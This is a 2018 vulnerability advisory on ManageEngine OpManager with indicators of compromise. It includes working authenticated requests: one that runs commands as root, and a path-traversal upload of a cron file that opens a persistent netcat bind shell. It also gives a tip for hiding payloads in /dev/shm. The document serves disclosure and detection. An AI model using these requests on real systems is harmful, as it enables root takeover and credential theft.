Manage Engine OpManager Multiple Authenticated RCE Vulnerabilities

Jun 19 2018

Pulse Security has identified two vulnerabilities in the ManageEngine OpManager software currently being exploited in the wild, and one observational note. This document details the vulnerabilities and the indicators of compromise that may be used to identify these exploits.

The remote code execution vulnerabilities were confirmed against build 123148. Pulse Security are not aware of an official patch to address these vulnerabilities.

UPDATE: Manage Engine have released patch 123160 that allegedly fixes these issues

Title: ManageEngine OpManager – Multiple Authenticated RCE Vulnerabilities
Date Released: 19/06/2018
Author: Denis Andzakovic
Vendor Website: https://www.manageengine.com/network-monitoring/
Affected Software: ManageEngine OpManager

Summary

The testNewScriptTemplate API was used by attackers in the wild to execute arbitrary commands after gaining initial access to the OpManager installation. The testNewScriptTemplate API is used to execute scripts on OpManager managed hosts and is intended functionality. The uploadMib API was also leveraged by attackers to upload files. The uploadMib endpoint is vulnerable to directory traversal and may be used to overwrite files and gain code execution. Additionally, the mobileNativeLogin API uses passwords submitted via the HTTP GET parameter, which exposes this information in the OpManager access log.

This advisory should not be considered a definitive list of vulnerabilities within OpManager. Additional vulnerabilities and intended functionality allowing for arbitrary command execution likely exist.

Recommendations

All the vulnerabilities detailed in this document require authentication. The OpManager installation ships with multiple default user accounts and passwords, which increases the likelihood of exploitation. Additionally, OpManager does not implement brute force protection for these accounts. Pulse Security recommends changing the password for the admin user, removing the trialuserlogin account and ensuring the IntegrationUser account cannot login. Users who have upgraded from an earlier version of OpManager may still have the IntegrationUser enabled. Access logs should be monitored for any unauthorized access attempts. The OpManager server should be adequately defended with network layer access controls and application logfile monitoring. As the OpManager stores credentials for services such as WMI and VMWare logins in a reversible encryption format, there is a high risk of further environment compromise after the attacker compromises the OpManager application.

Vulnerabilities

testNewScriptTemplate Command Execution

The testNewScriptTemplate API allows OpManager user to execute arbitrary commands. The following figures details the request used to execute arbitrary commands on the OpManager host. This vulnerability was tested on an OpManager Linux installation.

POST /api/json/admin/testNewScriptTemplate?apiKey=<valid API key> HTTP/1.1
Host: 192.168.38.159
Content-Length: 193
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close

scriptTemplateName=test&interval=15&yaxisText=units&commandLine=/bin/bash -e
${FileName}&scriptBody=#!/bin/bash%0aid&timeout=10&executeFrom=Local&workingDir=%2Fvar%2Ftmp%2F&deviceName=opmanager
HTTP/1.1 200
_ommited_

{"message":"","dataMap":{},"rawoutput":"uid=0(root) gid=0(root)
groups=0(root)","exitCode":0}

Note that for the request to succeed the target device needs to have a non-null type. The opanager device’s type was set to an arbitrary string using the following request

POST /api/json/device/UpdateDeviceDetails?apiKey=<valid API key> HTTP/1.1
Host: 192.168.38.159
Content-Length: 198
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close

name=opmanager&category=Unknown&TcpPortNumber=0&displayName=Opmanager&ipAddress=192.168.38.159&vendor=Vmware&Dependency=None&type=Whatever&ramSize=0&hardDiskSize=0&Encoding=ISO-8859-1&pollUsing=ICMP

uploadMib File Upload

The uploadMib API endpoint allows for path traversal and the creation of files with no extension. This allows a malicious user to overwrite files as the root user. The following POC uploads a crontab configuration that creates a persistent bind shell. Two minutes must elapse between the upload and a bind shell being established.

POST /api/json/mibbrowser/uploadMib?apiKey=<valid API key> HTTP/1.1
Host: 192.168.38.159
Content-Length: 449
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyFV62c116f93bfaA
Connection: close

------WebKitFormBoundaryyFV62c116f93bfaA
Content-Disposition: form-data; name="mibFile";filename="../../../../../../etc/cron.d/opman"
Content-Type: application/octet-stream

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root test -p /dev/shm/pipe && /bin/bash < /dev/shm/pipe 2>&1 | nc -l -p 4132 >
/dev/shm/pipe 2>/dev/null || mkfifo /dev/shm/pipe

------WebKitFormBoundaryyFV62c116f93bfaA--
:~$ nc -v 192.168.38.159 4132
Connection to 192.168.38.159 4132 port [tcp/*] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)

mobileNativeLogin Password in GET Request

The mobileNativeLogin endpoint, used by the OpManager mobile application, expects passwords submitted via a HTTP GET parameter. This behavior exposes the passwords in the OpManager access_log.txt file. An attacker who has compromised the OpManager server may leverage this behavior to gain further access in the wider environment.

The following figure shows an excerpt of the access_log.txt file containing the cleartext passwords:

192.168.38.182 - - [08/Jun/2018:10:55:32 +1300] "POST
/mobileNativeLogin?password=MyPassword&userName=user@mydom.com HTTP/1.1" 200 212

This vulnerability was allegedly fixed in the 12300 release.

Indicators of Compromise

The following section details the example log file entries for detecting the above vulnerabilities.

testNewScriptTemplate Command Execution

= logs/access_log.txt =
192.168.38.162 - - [08/Jun/2018:04:09:53 +0000] "/api/json/admin/testNewScriptTemplate" 200 105

The opmanager_serverOut_0.txt file contains significant information concerning the script execution, however this log file rolls over frequently.

= logs/opm/opmanager_serverout_0.txt =
[04:14:52:844]|[06-08-2018]|[com.adventnet.opmanager.opmservout]|[INFO]|[378]:
OpManagerAPIServlet:: processRequest:: uri : /admin/testNewScriptTemplate|
[04:14:52:848]|[06-08-2018]|[com.adventnet.opmanager.opmservout]|[INFO]|[378]: SCRIPT::
ExecuteScriptHandler:: executeScript: opmanager|
[04:14:52:849]|[06-08-2018]|    [com.adventnet.opmanager.opmservout]|[INFO]|[378]: SCRIPT::
ExecuteScriptHandler:: fileNameWithExt: /var/tmp/OpManager_0_1528431292849|
[04:14:52:855]|[06-08-2018]|[com.adventnet.opmanager.opmservout]|[INFO]|[378]: SCRIPT::
ExecuteScriptHandler:: Command to execute: /bin/bash -e OpManager_0_1528431292849|
[04:14:52:864]|[06-08-2018]|[com.adventnet.opmanager.opmservout]|[INFO]|[378]: SCRIPT::
ExecuteScriptHandler:: Script execution finished. ScriptID:0; Script Result:{Data={},
message=, RawData=Linux opmanager 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC
2018 x86_64 x86_64 x86_64 GNU/Linux, scriptID=0, exitcode=0}|
[04:14:52:865]|[06-08-2018]|[com.adventnet.opmanager.opmservout]|[INFO]|[378]:
OpManagerAPIServlet:: Request uri : /admin/testNewScriptTemplate & processing time : 21|

The testNewScriptTemplate API creates temporary files which are executed. The attacker may place their payload either in the commandLine or scriptBody parameters. The temporary files are unlinked after the commands are executed, however filesystem analysis can retrieve these files. An attacker may avoid having the malicious scriptBody retrieved by leveraging a tmpfs filesystem, such as /dev/shm.

uploadMib File Upload

= logs/access_log.txt =
    192.168.38.162 - admin [08/Jun/2018:04:23:10 +0000] "/api/json/mibbrowser/uploadMib" 200
    106
= logs/opm/opmanager_serverout_0.txt =
    [04:23:09:952]|[06-08-2018]|[com.adventnet.opmanager.opmservout]|[INFO]|[380]:
    OpManagerAPIServlet:: processRequest:: uri : /mibbrowser/uploadMib|
    [04:23:10:001]|[06-08-2018]|[com.adventnet.opmanager.opmservout]|[INFO]|[380]:
    OpManagerAPIServlet:: Request uri : /mibbrowser/uploadMib & processing time : 49|

TIMELINE

11/06/2018 - Initial email to Zoho
12/06/2018 - Advisory document sent to Zoho
12/06/2018 - Acknowledgement from Zoho
19/06/2018 - Advisory release